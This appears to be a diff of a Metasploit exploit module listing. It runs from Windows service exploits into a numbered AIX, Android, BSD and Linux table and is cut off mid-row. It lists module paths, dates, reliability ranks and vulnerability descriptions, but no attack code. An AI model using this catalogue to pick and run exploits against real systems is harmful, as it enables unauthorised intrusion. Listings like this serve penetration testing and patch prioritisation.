Microsoft RRAS Service Overflow - windows/smb/ms06_040_netapi 2006-08-08 good No MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow - windows/smb/ms06_066_nwapi 2006-11-14 good No MS06-066 Microsoft Services nwapi32.dll Module Exploit - windows/smb/ms06_066_nwwks 2006-11-14 good No MS06-066 Microsoft Services nwwks.dll Module Exploit - windows/smb/ms06_070_wkssvc 2006-11-14 manual No MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow - windows/smb/ms07_029_msdns_zonename 2007-04-12 manual No MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB) - windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption - windows/smb/ms09_050_smb2_negotiate_func_index 2009-09-07 good No MS09-050 Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference - windows/smb/ms10_046_shortcut_icon_dllloader 2010-07-16 excellent No Microsoft Windows Shell LNK Code Execution - windows/smb/ms10_061_spoolss 2010-09-14 excellent No MS10-061 Microsoft Print Spooler Service Impersonation Vulnerability - windows/smb/ms15_020_shortcut_icon_dllloader 2015-03-10 excellent No Microsoft Windows Shell LNK Code Execution - windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption - windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+ - windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution - windows/smb/netidentity_xtierrpcpipe 2009-04-06 great No Novell NetIdentity Agent XTIERRPCPIPE Named Pipe Buffer Overflow - windows/smb/psexec 1999-01-01 manual No Microsoft Windows Authenticated User Code Execution - windows/smb/psexec_psh 1999-01-01 manual No Microsoft Windows Authenticated Powershell Command Execution - windows/smb/smb_delivery 2016-07-26 excellent No SMB Delivery - windows/smb/smb_relay 2001-03-31 excellent No MS08-068 Microsoft Windows SMB Relay Code Execution - windows/smb/timbuktu_plughntcommand_bof 2009-06-25 great No Timbuktu PlughNTCommand Named Pipe Buffer Overflow - windows/smb/webexec 2018-10-24 manual No WebExec Authenticated User Code Execution - windows/smtp/mailcarrier_smtp_ehlo 2004-10-26 good Yes TABS MailCarrier v2.51 SMTP EHLO Overflow - windows/smtp/mercury_cram_md5 2007-08-18 great No Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow - windows/smtp/ms03_046_exchange2000_xexch50 2003-10-15 good Yes MS03-046 Exchange 2000 XEXCH50 Heap Overflow - windows/smtp/njstar_smtp_bof 2011-10-31 normal Yes NJStar Communicator 3.00 MiniSMTP Buffer Overflow - windows/smtp/sysgauge_client_bof 2017-02-28 normal No SysGauge SMTP Validation Buffer Overflow - windows/smtp/wmailserver 2005-07-11 average No SoftiaCom WMailserver 1.0 Buffer Overflow - windows/smtp/ypops_overflow1 2004-09-27 average Yes YPOPS 0.6 Buffer Overflow - windows/ssh/freeftpd_key_exchange 2006-05-12 average No FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow - windows/ssh/freesshd_authbypass 2010-08-11 excellent Yes Freesshd Authentication Bypass - windows/ssh/freesshd_key_exchange 2006-05-12 average No FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow - windows/ssh/putty_msg_debug 2002-12-16 normal No PuTTY Buffer Overflow - windows/ssh/securecrt_ssh1 2002-07-23 average No SecureCRT SSH1 Buffer Overflow - windows/ssh/sysax_ssh_username 2012-02-27 normal Yes Sysax 5.53 SSH Username Buffer Overflow - windows/ssl/ms04_011_pct 2004-04-13 average No MS04-011 Microsoft Private Communications Transport Overflow - windows/telnet/gamsoft_telsrv_username 2000-07-17 average Yes GAMSoft TelSrv 1.5 Username Buffer Overflow - windows/telnet/goodtech_telnet 2005-03-15 average No GoodTech Telnet Server Buffer Overflow - windows/tftp/attftp_long_filename 2006-11-27 average No Allied Telesyn TFTP Server 1.9 Long Filename Overflow - windows/tftp/distinct_tftp_traversal 2012-04-08 excellent No Distinct TFTP 3.10 Writable Directory Traversal Execution - windows/tftp/dlink_long_filename 2007-03-12 good No D-Link TFTP 1.0 Long Filename Buffer Overflow - windows/tftp/futuresoft_transfermode 2005-05-31 average No FutureSoft TFTP Server 2000 Transfer-Mode Overflow - windows/tftp/netdecision_tftp_traversal 2009-05-16 excellent No NetDecision 4.2 TFTP Writable Directory Traversal Execution - windows/tftp/opentftp_error_code 2008-07-05 average No OpenTFTP SP 1.4 Error Packet Overflow - windows/tftp/quick_tftp_pro_mode 2008-03-27 good No Quick FTP Pro 2.1 Transfer-Mode Overflow - windows/tftp/tftpd32_long_filename 2002-11-19 average No TFTPD32 Long Filename Buffer Overflow - windows/tftp/tftpdwin_long_filename 2006-09-21 great No TFTPDWIN v0.4.2 Long Filename Buffer Overflow - windows/tftp/tftpserver_wrq_bof 2008-03-26 normal No TFTP Server for Windows 1.4 ST WRQ Buffer Overflow - windows/tftp/threectftpsvc_long_mode 2006-11-27 great No 3CTftpSvc TFTP Long Mode Buffer Overflow - windows/unicenter/cam_log_security 2005-08-22 great Yes CA CAM log_security() Stack Buffer Overflow (Win32) - windows/vnc/realvnc_client 2001-01-29 normal No RealVNC 3.3.7 Client Buffer Overflow - windows/vnc/ultravnc_client 2006-04-04 normal No UltraVNC 1.0.1 Client Buffer Overflow - windows/vnc/ultravnc_viewer_bof 2008-02-06 normal No UltraVNC 1.0.2 Client (vncviewer.exe) Buffer Overflow - windows/vnc/winvnc_http_get 2001-01-29 average No WinVNC Web Server GET Overflow - windows/vpn/safenet_ike_11 2009-06-01 average No SafeNet SoftRemote IKE Service Buffer Overflow - windows/winrm/winrm_script_exec 2012-11-01 manual No WinRM Script Exec Remote Code Execution - windows/wins/ms04_045_wins 2004-12-14 great Yes MS04-045 Microsoft WINS Service Memory Overwrite + # Name Disclosure Date Rank Check Description + - ---- --------------- ---- ----- ----------- + 1 aix/local/ibstat_path 2013-09-24 excellent Yes ibstat $PATH Privilege Escalation + 2 aix/rpc_cmsd_opcode21 2009-10-07 great No AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow + 3 aix/rpc_ttdbserverd_realpath 2009-06-17 great No ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX) + 4 android/adb/adb_server_exec 2016-01-01 excellent Yes Android ADB Debug Server Remote Payload Execution + 5 android/browser/samsung_knox_smdm_url 2014-11-12 excellent No Samsung Galaxy KNOX Android Browser RCE + 6 android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal No Android Stagefright MP4 tx3g Integer Overflow + 7 android/browser/webview_addjavascriptinterface 2012-12-21 excellent No Android Browser and WebView addJavascriptInterface Code Execution + 8 android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good No Adobe Reader for Android addJavascriptInterface Exploit + 9 android/local/futex_requeue 2014-05-03 excellent No Android 'Towelroot' Futex Requeue Kernel Exploit + 10 android/local/put_user_vroot 2013-09-06 excellent No Android get_user/put_user Exploit + 11 android/local/su_exec 2017-08-31 manual No Android 'su' Privilege Escalation + 12 apple_ios/browser/safari_libtiff 2006-08-01 good No Apple iOS MobileSafari LibTIFF Buffer Overflow + 13 apple_ios/browser/webkit_trident 2016-08-25 manual No WebKit not_number defineProperties UAF + 14 apple_ios/email/mobilemail_libtiff 2006-08-01 good No Apple iOS MobileMail LibTIFF Buffer Overflow + 15 apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent No Apple iOS Default SSH Password Vulnerability + 16 bsd/finger/morris_fingerd_bof 1988-11-02 normal Yes Morris Worm fingerd Stack Buffer Overflow + 17 bsdi/softcart/mercantec_softcart 2004-08-19 great No Mercantec SoftCart CGI Overflow + 18 dialup/multi/login/manyargs 2001-12-12 good No System V Derived /bin/login Extraneous Arguments Buffer Overflow + 19 firefox/local/exec_shellcode 2014-03-10 excellent No Firefox Exec Shellcode from Privileged Javascript Shell + 20 freebsd/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD) + 21 freebsd/http/watchguard_cmd_exec 2015-06-29 excellent Yes Watchguard XCS Remote Command Execution + 22 freebsd/local/intel_sysret_priv_esc 2012-06-12 great Yes FreeBSD Intel SYSRET Privilege Escalation + 23 freebsd/local/mmap 2013-06-18 great Yes FreeBSD 9 Address Space Manipulation Privilege Escalation + 24 freebsd/local/watchguard_fix_corrupt_mail 2015-06-29 manual Yes Watchguard XCS FixCorruptMail Local Privilege Escalation + 25 freebsd/misc/citrix_netscaler_soap_bof 2014-09-22 normal Yes Citrix NetScaler SOAP Handler Remote Code Execution + 26 freebsd/samba/trans2open 2003-04-07 great No Samba trans2open Overflow (*BSD x86) + 27 freebsd/tacacs/xtacacsd_report 2008-01-08 average No XTACACSD report() Buffer Overflow + 28 freebsd/telnet/telnet_encrypt_keyid 2011-12-23 great No FreeBSD Telnet Service Encryption Key ID Buffer Overflow + 29 hpux/lpd/cleanup_exec 2002-08-28 excellent No HP-UX LPD Command Execution + 30 irix/lpd/tagprinter_exec 2001-09-01 excellent Yes Irix LPD tagprinter Command Execution + 31 linux/antivirus/escan_password_exec 2014-04-04 excellent Yes eScan Web Management Console Command Injection + 32 linux/browser/adobe_flashplayer_aslaunch 2008-12-17 good No Adobe Flash Player ActionScript Launch Command Execution Vulnerability + 33 linux/ftp/proftp_sreplace 2006-11-26 great Yes ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux) + 34 linux/ftp/proftp_telnet_iac 2010-11-01 great Yes ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux) + 35 linux/games/ut2004_secure 2004-06-18 good Yes Unreal Tournament 2004 "secure" Overflow (Linux) + 36 linux/http/accellion_fta_getstatus_oauth 2015-07-10 excellent Yes Accellion FTA getStatus verify_oauth_token Command Execution + 37 linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Yes Advantech Switch Bash Environment Variable Code Injection (Shellshock) + 38 linux/http/airties_login_cgi_bof 2015-03-31 normal Yes Airties login-cgi Buffer Overflow + 39 linux/http/alcatel_omnipcx_mastercgi_exec 2007-09-09 manual No Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution + 40 linux/http/alienvault_exec 2017-01-31 excellent Yes AlienVault OSSIM/USM Remote Code Execution + 41 linux/http/alienvault_sqli_exec 2014-04-24 excellent Yes AlienVault OSSIM SQL Injection and Remote Code Execution + 42 linux/http/apache_continuum_cmd_exec 2016-04-06 excellent Yes Apache Continuum Arbitrary Command Execution + 43 linux/http/apache_couchdb_cmd_exec 2016-04-06 excellent Yes Apache CouchDB Arbitrary Command Execution + 44 linux/http/astium_sqli_upload 2013-09-17 manual Yes Astium Remote Code Execution + 45 linux/http/asuswrt_lan_rce 2018-01-22 excellent No AsusWRT LAN Unauthenticated Remote Code Execution + 46 linux/http/atutor_filemanager_traversal 2016-03-01 excellent Yes ATutor 2.2.1 Directory Traversal / Remote Code Execution + 47 linux/http/axis_srv_parhand_rce 2018-06-18 excellent Yes Axis Network Camera .srv to parhand RCE + 48 linux/http/belkin_login_bof 2014-05-09 normal Yes Belkin Play N750 login.cgi Buffer Overflow + 49 linux/http/centreon_sqli_exec 2014-10-15 excellent Yes Centreon SQL and Command Injection + 50 linux/http/centreon_useralias_exec 2016-02-26 excellent Yes Centreon Web Useralias Command Execution + 51 linux/http/cfme_manageiq_evm_upload_exec 2013-09-04 excellent Yes Red Hat CloudForms Management Engine 5.1 agent/linuxpkgs Path Traversal + 52 linux/http/cisco_firepower_useradd 2016-10-10 excellent Yes Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability + 53 linux/http/cisco_prime_inf_rce 2018-10-04 excellent Yes Cisco Prime Infrastructure Unauthenticated Remote Code Execution + 54 linux/http/cisco_rv130_rmi_rce 2019-02-27 good No Cisco RV130W Routers Management Interface Remote Command Execution + 55 linux/http/cisco_rv32x_rce 2018-09-09 normal Yes Cisco RV320 and RV325 Unauthenticated Remote Code Execution + 56 linux/http/crypttech_cryptolog_login_exec 2017-05-03 excellent Yes Crypttech CryptoLog Remote Code Execution + 57 linux/http/dcos_marathon 2017-03-03 excellent Yes DC/OS Marathon UI Docker Exploit + 58 linux/http/ddwrt_cgibin_exec 2009-07-20 excellent No DD-WRT HTTP Daemon Arbitrary Command Execution + 59 linux/http/denyall_waf_exec 2017-09-19 excellent Yes DenyAll Web Application Firewall Remote Code Execution + 60 linux/http/dlink_authentication_cgi_bof 2013-02-08 normal Yes D-Link authentication.cgi Buffer Overflow + 61 linux/http/dlink_command_php_exec_noauth 2013-02-04 excellent No D-Link Devices Unauthenticated Remote Command Execution + 62 linux/http/dlink_dcs931l_upload 2015-02-23 great Yes D-Link DCS-931L File Upload + 63 linux/http/dlink_dcs_930l_authenticated_remote_command_execution 2015-12-20 excellent No D-Link DCS-930L Authenticated Remote Command Execution + 64 linux/http/dlink_diagnostic_exec_noauth 2013-03-05 excellent No D-Link DIR-645 / DIR-815 diagnostic.php Command Execution + 65 linux/http/dlink_dir300_exec_telnet 2013-04-22 excellent No D-Link Devices Unauthenticated Remote Command Execution + 66 linux/http/dlink_dir605l_captcha_bof 2012-10-08 manual Yes D-Link DIR-605L Captcha Handling Buffer Overflow + 67 linux/http/dlink_dir615_up_exec 2013-02-07 excellent No D-Link DIR615h OS Command Injection + 68 linux/http/dlink_dir850l_unauth_exec 2017-08-09 excellent Yes DIR-850L (Un)authenticated OS Command Exec + 69 linux/http/dlink_dsl2750b_exec_noauth 2016-02-05 great Yes D-Link DSL-2750B OS Command Injection + 70 linux/http/dlink_dspw110_cookie_noauth_exec 2015-06-12 normal Yes D-Link Cookie Command Execution + 71 linux/http/dlink_dspw215_info_cgi_bof 2014-05-22 normal Yes D-Link info.cgi POST Request Buffer Overflow + 72 linux/http/dlink_hedwig_cgi_bof 2013-02-08 normal Yes D-Link hedwig.cgi Buffer Overflow in Cookie Header + 73 linux/http/dlink_hnap_bof 2014-05-15 normal Yes D-Link HNAP Request Remote Buffer Overflow + 74 linux/http/dlink_hnap_header_exec_noauth 2015-02-13 normal Yes D-Link Devices HNAP SOAPAction-Header Command Execution + 75 linux/http/dlink_hnap_login_bof 2016-11-07 excellent Yes Dlink DIR Routers Unauthenticated HNAP Login Stack Buffer Overflow + 76 linux/http/dlink_upnp_exec_noauth 2013-07-05 normal Yes D-Link Devices UPnP SOAP Command Execution + 77 linux/http/dnalims_admin_exec 2017-03-08 excellent Yes dnaLIMS Admin Module Command Execution + 78 linux/http/docker_daemon_tcp 2017-07-25 excellent Yes Docker Daemon - Unprotected TCP Socket Exploit + 79 linux/http/dolibarr_cmd_exec 2012-04-06 excellent Yes Dolibarr ERP/CRM Post-Auth OS Command Injection + 80 linux/http/dreambox_openpli_shell 2013-02-08 great No OpenPLI Webif Arbitrary Command Execution + 81 linux/http/efw_chpasswd_exec 2015-06-28 excellent No Endian Firewall Proxy Password Change Command Injection + 82 linux/http/empire_skywalker 2016-10-15 excellent Yes PowerShellEmpire Arbitrary File Upload (Skywalker) + 83 linux/http/esva_exec 2012-08-16 excellent Yes E-Mail Security Virtual Appliance learn-msg.cgi Command Injection + 84 linux/http/f5_icall_cmd 2015-09-03 excellent Yes F5 iControl iCall::Script Root Command Execution + 85 linux/http/f5_icontrol_exec 2013-09-17 excellent Yes F5 iControl Remote Root Command Execution + 86 linux/http/foreman_openstack_satellite_code_exec 2013-06-06 excellent No Foreman (Red Hat OpenStack/Satellite) bookmarks/create Code Injection + 87 linux/http/fritzbox_echo_exec 2014-02-11 excellent Yes Fritz!Box Webcm Unauthenticated Command Injection + 88 linux/http/github_enterprise_secret 2017-03-15 excellent Yes Github Enterprise Default Session Secret And Deserialization Vulnerability + 89 linux/http/gitlist_exec 2014-06-30 excellent Yes Gitlist Unauthenticated Remote Command Execution + 90 linux/http/goahead_ldpreload 2017-12-18 excellent Yes GoAhead Web Server LD_PRELOAD Arbitrary Module Load + 91 linux/http/goautodial_3_rce_command_injection 2015-04-21 excellent Yes GoAutoDial 3.3 Authentication Bypass / Command Injection + 92 linux/http/gpsd_format_string 2005-05-25 average No Berlios GPSD Format String Vulnerability + 93 linux/http/groundwork_monarch_cmd_exec 2013-03-08 excellent Yes GroundWork monarch_scan.cgi OS Command Injection + 94 linux/http/hadoop_unauth_exec 2016-10-19 excellent Yes Hadoop YARN ResourceManager Unauthenticated Command Execution + 95 linux/http/hp_system_management 2012-09-01 normal Yes HP System Management Anonymous Access Code Execution + 96 linux/http/hp_van_sdn_cmd_inject 2018-06-25 excellent Yes HP VAN SDN Controller Root Command Injection + 97 linux/http/huawei_hg532n_cmdinject 2017-04-15 excellent Yes Huawei HG532n Command Injection + 98 linux/http/ibm_qradar_unauth_rce 2018-05-28 excellent Yes IBM QRadar SIEM Unauthenticated Remote Code Execution + 99 linux/http/imperva_securesphere_exec 2018-10-08 excellent Yes Imperva SecureSphere PWS Command Injection + 100 linux/http/ipfire_bashbug_exec 2014-09-29 excellent Yes IPFire Bash Environment Variable Injection (Shellshock) + 101 linux/http/ipfire_oinkcode_exec 2017-06-09 excellent Yes IPFire proxy.cgi RCE + 102 linux/http/ipfire_proxy_exec 2016-05-04 excellent Yes IPFire proxy.cgi RCE + 103 linux/http/kaltura_unserialize_cookie_rce 2017-09-12 excellent Yes Kaltura Remote PHP Code Execution over Cookie + 104 linux/http/kaltura_unserialize_rce 2016-03-15 excellent Yes Kaltura Remote PHP Code Execution + 105 linux/http/kloxo_sqli 2014-01-28 manual Yes Kloxo SQL Injection and Remote Code Execution + 106 linux/http/lifesize_uvc_ping_rce 2014-03-21 excellent No LifeSize UVC Authenticated RCE via Ping + 107 linux/http/linksys_apply_cgi 2005-09-13 great No Linksys WRT54 Access Point apply.cgi Buffer Overflow + 108 linux/http/linksys_e1500_apply_exec 2013-02-05 excellent No Linksys E1500/E2500 apply.cgi Remote Command Injection + 109 linux/http/linksys_themoon_exec 2014-02-13 excellent Yes Linksys E-Series TheMoon Remote Command Injection + 110 linux/http/linksys_wrt110_cmd_exec 2013-07-12 excellent Yes Linksys Devices pingstr Remote Command Injection + 111 linux/http/linksys_wrt160nv2_apply_exec 2013-02-11 excellent No Linksys WRT160nv2 apply.cgi Remote Command Injection + 112 linux/http/linksys_wrt54gl_apply_exec 2013-01-18 manual No Linksys WRT54GL apply.cgi Command Execution + 113 linux/http/linksys_wvbr0_user_agent_exec_noauth 2017-12-13 excellent Yes Linksys WVBR0-25 User-Agent Command Execution + 114 linux/http/logsign_exec 2017-02-26 excellent Yes Logsign Remote Command Injection + 115 linux/http/mailcleaner_exec 2018-12-19 excellent No Mailcleaner Remote Code Execution + 116 linux/http/microfocus_secure_messaging_gateway 2018-06-19 excellent Yes MicroFocus Secure Messaging Gateway Remote Code Execution + 117 linux/http/multi_ncc_ping_exec 2015-02-26 normal Yes D-Link/TRENDnet NCC Service Command Injection + 118 linux/http/mutiny_frontend_upload 2013-05-15 excellent Yes Mutiny 5 Arbitrary File Upload + 119 linux/http/mvpower_dvr_shell_exec 2015-08-23 excellent Yes MVPower DVR Shell Unauthenticated Command Execution + 120 linux/http/nagios_xi_chained_rce 2016-03-06 excellent Yes Nagios XI Chained Remote Code Execution + 121 linux/http/nagios_xi_chained_rce_2_electric_boogaloo 2018-04-17 manual Yes Nagios XI Chained Remote Code Execution + 122 linux/http/netgear_dgn1000_setup_unauth_exec 2013-06-05 excellent Yes Netgear DGN1000 Setup.cgi Unauthenticated RCE + 123 linux/http/netgear_dgn1000b_setup_exec 2013-02-06 excellent No Netgear DGN1000B setup.cgi Remote Command Execution + 124 linux/http/netgear_dgn2200b_pppoe_exec 2013-02-15 manual No Netgear DGN2200B pppoe.cgi Remote Command Execution + 125 linux/http/netgear_dnslookup_cmd_exec 2017-02-25 excellent Yes Netgear DGN2200 dnslookup.cgi Command Injection + 126 linux/http/netgear_r7000_cgibin_exec 2016-12-06 excellent Yes Netgear R7000 and R6400 cgi-bin Command Injection + 127 linux/http/netgear_readynas_exec 2013-07-12 manual Yes NETGEAR ReadyNAS Perl Code Evaluation + 128 linux/http/netgear_unauth_exec 2016-02-25 excellent Yes Netgear Devices Unauthenticated Remote Command Execution + 129 linux/http/netgear_wnr2000_rce 2016-12-20 excellent Yes NETGEAR WNR2000v5 (Un)authenticated hidden_lang_avi Stack Overflow + 130 linux/http/nginx_chunked_size 2013-05-07 great Yes Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow + 131 linux/http/nuuo_nvrmini_auth_rce 2016-08-04 excellent No NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution + 132 linux/http/nuuo_nvrmini_unauth_rce 2016-08-04 excellent Yes NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Unauthenticated Remote Code Execution + 133 linux/http/op5_config_exec 2016-04-08 excellent Yes op5 v7.1.9 Configuration Command Execution + 134 linux/http/openfiler_networkcard_exec 2012-09-04 excellent Yes Openfiler v2.x NetworkCard Command Execution + 135 linux/http/pandora_fms_exec 2014-01-29 excellent Yes Pandora FMS Remote Code Execution + 136 linux/http/pandora_fms_sqli 2014-02-01 excellent Yes Pandora FMS Default Credential / SQLi Remote Code Execution + 137 linux/http/panos_readsessionvars 2017-12-11 excellent No Palo Alto Networks readSessionVarsFromFile() Session Corruption + 138 linux/http/peercast_url 2006-03-08 average No PeerCast URL Handling Buffer Overflow + 139 linux/http/php_imap_open_rce 2018-10-23 good Yes php imap_open Remote Code Execution + 140 linux/http/pineapp_ldapsyncnow_exec 2013-07-26 excellent Yes PineApp Mail-SeCure ldapsyncnow.php Arbitrary Command Execution + 141 linux/http/pineapp_livelog_exec 2013-07-26 excellent Yes PineApp Mail-SeCure livelog.html Arbitrary Command Execution + 142 linux/http/pineapp_test_li_conn_exec 2013-07-26 excellent Yes PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution + 143 linux/http/pineapple_bypass_cmdinject 2015-08-01 excellent Yes Hak5 WiFi Pineapple Preconfiguration Command Injection + 144 linux/http/pineapple_preconfig_cmdinject 2015-08-01 excellent Yes Hak5 WiFi Pineapple Preconfiguration Command Injection + 145 linux/http/piranha_passwd_exec 2000-04-04 excellent No RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution + 146 linux/http/qnap_qcenter_change_passwd_exec 2018-07-11 excellent Yes QNAP Q'Center change_passwd Command Execution + 147 linux/http/raidsonic_nas_ib5220_exec_noauth 2013-02-04 manual No Raidsonic NAS Devices Unauthenticated Remote Command Execution + 148 linux/http/railo_cfml_rfi 2014-08-26 excellent Yes Railo Remote File Include + 149 linux/http/rancher_server 2017-07-27 excellent Yes Rancher Server - Docker Exploit + 150 linux/http/realtek_miniigd_upnp_exec_noauth 2015-04-24 normal Yes Realtek SDK Miniigd UPnP SOAP Command Execution + 151 linux/http/riverbed_netprofiler_netexpress_exec 2016-06-27 excellent Yes Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution + 152 linux/http/samsung_srv_1670d_upload_exec 2017-03-14 good Yes Samsung SRN-1670D Web Viewer Version 1.0.0.193 Arbitrary File Read and Upload + 153 linux/http/seagate_nas_php_exec_noauth 2015-03-01 normal Yes Seagate Business NAS Unauthenticated Remote Command Execution + 154 linux/http/smt_ipmi_close_window_bof 2013-11-06 good Yes Supermicro Onboard IPMI close_window.cgi Buffer Overflow + 155 linux/http/sophos_wpa_iface_exec 2014-04-08 excellent No Sophos Web Protection Appliance Interface Authenticated Arbitrary Command Execution + 156 linux/http/sophos_wpa_sblistpack_exec 2013-09-06 excellent Yes Sophos Web Protection Appliance sblistpack Arbitrary Command Execution + 157 linux/http/spark_unauth_rce 2017-12-12 excellent Yes Apache Spark Unauthenticated Command Execution + 158 linux/http/supervisor_xmlrpc_exec 2017-07-19 excellent Yes Supervisor XML-RPC Authenticated Remote Code Execution + 159 linux/http/symantec_messaging_gateway_exec 2017-04-26 excellent No Symantec Messaging Gateway Remote Code Execution + 160 linux/http/symantec_web_gateway_exec 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection + 161 linux/http/symantec_web_gateway_file_upload 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability + 162 linux/http/symantec_web_gateway_lfi 2012-05-17 excellent Yes Symantec Web Gateway 5.0.2.8 relfile File Inclusion Vulnerability + 163 linux/http/symantec_web_gateway_pbcontrol 2012-07-23 excellent Yes Symantec Web Gateway 5.0.2.18 pbcontrol.php Command Injection + 164 linux/http/symantec_web_gateway_restore 2014-12-16 excellent Yes Symantec Web Gateway 5 restore.php Post Authentication Command Injection + 165 linux/http/synology_dsm_sliceupload_exec_noauth 2013-10-31 excellent Yes Synology DiskStation Manager SLICEUPLOAD Remote Command Execution + 166 linux/http/tiki_calendar_exec 2016-06-06 excellent Yes Tiki-Wiki CMS Calendar Command Execution + 167 linux/http/tp_link_sc2020n_authenticated_telnet_injection 2015-12-20 excellent No TP-Link SC2020n Authenticated Telnet Injection + 168 linux/http/tr064_ntpserver_cmdinject 2016-11-07 normal Yes Zyxel/Eir D1000 DSL Modem NewNTPServer Command Injection Over TR-064 + 169 linux/http/trend_micro_imsva_exec 2017-01-15 excellent No Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution + 170 linux/http/trendmicro_imsva_widget_exec 2017-10-07 excellent Yes Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution + 171 linux/http/trendmicro_sps_exec 2016-08-08 excellent Yes Trend Micro Smart Protection Server Exec Remote Code Injection + 172 linux/http/trueonline_billion_5200w_rce 2016-12-26 excellent No TrueOnline / Billion 5200W-T Router Unauthenticated Command Injection + 173 linux/http/trueonline_p660hn_v1_rce 2016-12-26 excellent Yes TrueOnline / ZyXEL P660HN-T v1 Router Unauthenticated Command Injection + 174 linux/http/trueonline_p660hn_v2_rce 2016-12-26 excellent Yes TrueOnline / ZyXEL P660HN-T v2 Router Authenticated Command Injection + 175 linux/http/ueb_api_rce 2017-08-08 excellent Yes Unitrends UEB http api remote code execution + 176 linux/http/vap2500_tools_command_exec 2014-11-25 normal Yes Arris VAP2500 tools_command.php Command Execution + 177 linux/http/vcms_upload 2011-11-27 excellent Yes V-CMS PHP File Upload and Execute + 178 linux/http/wanem_exec 2012-08-12 excellent Yes WAN Emulator v2.3 Command Execution + 179 linux/http/wd_mycloud_multiupload_upload 2017-07-29 excellent Yes Western Digital MyCloud multi_uploadify File Upload Vulnerability + 180 linux/http/webcalendar_settings_exec 2012-04-23 excellent Yes WebCalendar 1.2.4 Pre-Auth Remote Code Injection + 181 linux/http/webid_converter 2011-07-05 excellent Yes WeBid converter.php Remote PHP Code Injection + 182 linux/http/wipg1000_cmd_injection 2017-04-20 excellent Yes WePresent WiPG-1000 Command Injection + 183 linux/http/xplico_exec 2017-10-29 excellent Yes Xplico Remote Code Execution + 184 linux/http/zabbix_sqli 2013-09-23 excellent Yes Zabbix 2.0.8 SQL Injection and Remote Code Execution + 185 linux/http/zen_load_balancer_exec 2012-09-14 excellent Yes ZEN Load Balancer Filelog Command Execution + 186 linux/http/zenoss_showdaemonxmlconfig_exec 2012-07-30 good Yes Zenoss 3 showDaemonXMLConfig Command Execution + 187 linux/http/zimbra_xxe_rce 2019-03-13 excellent Yes Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF + 188 linux/ids/alienvault_centerd_soap_exec 2014-05-05 excellent Yes AlienVault OSSIM av-centerd Command Injection + 189 linux/ids/snortbopre 2005-10-18 good No Snort Back Orifice Pre-Preprocessor Buffer Overflow + 190 linux/imap/imap_uw_lsub 2000-04-16 good Yes UoW IMAP Server LSUB Buffer Overflow + 191 linux/local/abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt Privilege Escalation + 192 linux/local/af_packet_chocobo_root_priv_esc 2016-08-12 good Yes AF_PACKET chocobo_root Privilege Escalation + 193 linux/local/af_packet_packet_set_ring_priv_esc 2017-03-29 good Yes AF_PACKET packet_set_ring Privilege Escalation + 194 linux/local/apport_abrt_chroot_priv_esc 2015-03-31 excellent Yes Apport / ABRT chroot Privilege Escalation + 195 linux/local/apt_package_manager_persistence 1999-03-09 excellent No APT Package Manager Persistence + 196 linux/local/asan_suid_executable_priv_esc 2016-02-17 excellent Yes AddressSanitizer (ASan) SUID Executable Privilege Escalation + 197 linux/local/autostart_persistence 2006-02-13 excellent No Autostart Desktop Item Persistence + 198 linux/local/blueman_set_dhcp_handler_dbus_priv_esc 2015-12-18 excellent Yes blueman set_dhcp_handler D-Bus Privilege Escalation + 199 linux/local/bpf_priv_esc 2016-05-04 good Yes Linux BPF doubleput UAF Privilege Escalation + 200 linux/local/bpf_sign_extension_priv_esc 2017-11-12 great Yes Linux BPF Sign Extension Local Privilege Escalation + 201 linux/local/cron_persistence 1979-07-01 excellent No Cron Persistence + 202 linux/local/desktop_privilege_escalation 2014-08-07 excellent Yes Desktop Linux Password Stealer and Privilege Escalation + 203 linux/local/docker_daemon_privilege_escalation 2016-06-28 excellent Yes Docker Daemon Privilege Escalation + 204 linux/local/glibc_ld_audit_dso_load_priv_esc 2010-10-18 excellent Yes glibc LD_AUDIT Arbitrary DSO Load Privilege Escalation + 205 linux/local/glibc_origin_expansion_priv_esc 2010-10-18 excellent Yes glibc '$ORIGIN' Expansion Privilege Escalation + 206 linux/local/glibc_realpath_priv_esc 2018-01-16 normal Yes glibc 'realpath()' Privilege Escalation + 207 linux/local/hp_smhstart 2013-03-30 normal No HP System Management Homepage Local Privilege Escalation + 208 linux/local/juju_run_agent_priv_esc 